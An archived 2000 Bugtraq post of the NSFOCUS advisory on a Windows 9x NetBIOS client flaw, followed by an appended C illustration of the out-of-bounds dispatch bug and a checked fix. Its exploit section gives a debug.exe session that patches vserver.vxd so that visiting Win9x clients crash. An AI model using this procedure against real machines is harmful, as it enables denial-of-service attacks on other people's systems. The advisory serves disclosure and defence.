From security@NSFOCUS.COM Fri Oct 13 12:31:44 2000
From: Nsfocus Security Team
To: BUGTRAQ@SECURITYFOCUS.COM
Date: Thu, 12 Oct 2000 11:22:44 +0800
Subject: [BUGTRAQ] NSFOCUS SA2000-04: Microsoft Win9x client driver type comparing vulnerability

NSFOCUS Security Advisory (SA2000-04)

Topic: Microsoft Win9x client driver type comparing vulnerability
Release Date: Aug 20, 2000
Update Date: Oct 11, 2000

Affected System:
================
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98 Second Edition

Non-affected System:
====================
- Microsoft Windows NT
- Microsoft Windows 2000

Impact:
=======
NSFOCUS security team has found a security flaw in the Microsoft Win9x NetBIOS client. By exploiting this vulnerability, a malicious attacker can modify his file share service and perform a DoS attack against any Win9x client that visits it.

Description:
============
When a Win9x client accesses a NetBIOS file share service, it compares the driver type returned by the server against five known values. If the returned type is none of "?????", "A:", "LPT1:", "COMM" or "IPC", the comparison yields a sixth result, which is bogus because only five types exist. The Win9x client then converts this result into a wrong driver pointer, transfers control to the wrong driver function address and finally crashes.

A malicious user can send an HTML email to his target. One sample file looks like this:

hello

When a Win9x client reads the malicious HTML email with Outlook Express or another email client with HTML support, the client will be DoSed.

Exploits:
=========
You can do it like this (Windows 98 Second Edition, English version):

D:\WIN98\SYSTEM>debug vserver.vxd
-d 2b60
1266:2B60  3C 01 75 24 8B C8 C1 E9-10 83 F9 6A 73 05 83 F9   <.u$.......js...
1266:2B70  64 73 1B 83 F9 13 72 10-83 F9 1F 76 0C 80 7F 3E   ds....r....v...>
1266:2B80  05 73 05 83 F9 58 77 21-C3 66 B8 03 38 C3 83 F9   .s...Xw!.f..8...
1266:2B90  65 74 10 83 F9 68 74 32-83 F9 67 75 1B B8 03 38   et...ht2..gu...8
1266:2BA0  1A 00 C3 B8 03 38 1E 00-C3 83 F9 6E 74 10 83 F9   .....8.....nt...
1266:2BB0  70 74 11 83 F9 6C 74 12-B8 03 38 1F 00 C3 B8 01   pt...lt...8.....
1266:2BC0  00 02 00 C3 B8 03 38 27-00 C3 B8 03 38 15 00 C3   ......8'....8...
1266:2BD0  91 FE 48 32 75 0E 83 78-2A 00 74 08 8D 40 2A E8   ..H2u..x*.t..@*.
-n vserver.bak          (backup)
-w
Writing 1B8F8 bytes
-n vserver.vxd
-e 2b60 33 c0 c3
-w
Writing 1B8F8 bytes
-q

Reboot the machine. Set a password for a shared directory. Access the shared directory from another Win9x client. Usually the client will get a "blue screen", then the system will become unstable or halt.

Workaround:
===========
Don't access an untrusted host's file share service.
Disable NetBIOS over TCP/IP.

Solutions:
==========
Microsoft has been informed.

DISCLAIMER:
===========
THE INFORMATION PROVIDED IS RELEASED BY NSFOCUS "AS IS" WITHOUT WARRANTY OF ANY KIND. NSFOCUS DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, EXCEPT FOR THE WARRANTIES OF MERCHANTABILITY. IN NO EVENT SHALL NSFOCUS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF NSFOCUS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. DISTRIBUTION OR REPRODUCTION OF THE INFORMATION IS PERMITTED PROVIDED THAT THE ADVISORY IS NOT MODIFIED IN ANY WAY.

(c) 1999-2000 Nsfocus. All rights reserved.

Nsfocus Security Team
NSFOCUS INFORMATION TECHNOLOGY CO., LTD
(http://www.nsfocus.com)
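The lookup bug the Description section attributes to the Win9x client, modelled in C as an added example (not code from the advisory or from vserver.vxd): share_type_index, the handler names and their return codes are assumptions. The unchecked dispatch shows the vulnerable pattern; the checked form rejects an unknown type as a protocol error instead of indexing past the handler table.

```c
#include <stddef.h>
#include <string.h>

/* Added illustration of the advisory's bug class, not code from vserver.vxd. The
 * client matches the server-supplied share type against five known strings and
 * uses the match position as a handler index ("?????" = the five '?' glyphs). */
static const char *const KNOWN_TYPES[] = { "?????", "A:", "LPT1:", "COMM", "IPC" };
#define NUM_TYPES (sizeof KNOWN_TYPES / sizeof KNOWN_TYPES[0])
typedef int (*type_handler)(void);
/* Hypothetical handlers; each returns a distinct code so a test can see which ran. */
static int on_disk(void)    { return 1; }
static int on_floppy(void)  { return 2; }
static int on_printer(void) { return 3; }
static int on_comm(void)    { return 4; }
static int on_ipc(void)     { return 5; }
/* Exactly NUM_TYPES entries: there is no sixth handler. */
static const type_handler HANDLERS[NUM_TYPES] = { on_disk, on_floppy, on_printer, on_comm, on_ipc };
/* Comparison chain. An unrecognised type falls off the end and yields index
 * NUM_TYPES, the "sixth result" the advisory describes. */
size_t share_type_index(const char *type)
{
    size_t i;
    for (i = 0; i < NUM_TYPES; i++)
        if (strcmp(type, KNOWN_TYPES[i]) == 0)
            return i;
    return i; /* == NUM_TYPES: one past the last valid handler */
}
/* Vulnerable pattern: the index is trusted, so an unknown type reads the function
 * pointer just past HANDLERS and jumps to whatever it finds. Shown for contrast;
 * only ever call it with a known type. */
int dispatch_unchecked(const char *type)
{
    return HANDLERS[share_type_index(type)]();
}
/* Reports, without doing the bad read, whether the unchecked dispatch would
 * index past the table for this server-supplied type. */
int lookup_is_out_of_bounds(const char *type)
{
    return share_type_index(type) >= NUM_TYPES;
}
/* Hardened pattern: an unexpected type is a protocol error to reject, not an
 * index to dereference. */
int dispatch_checked(const char *type)
{
    size_t idx = share_type_index(type);
    if (idx >= NUM_TYPES)
        return -1;
    return HANDLERS[idx]();
}
```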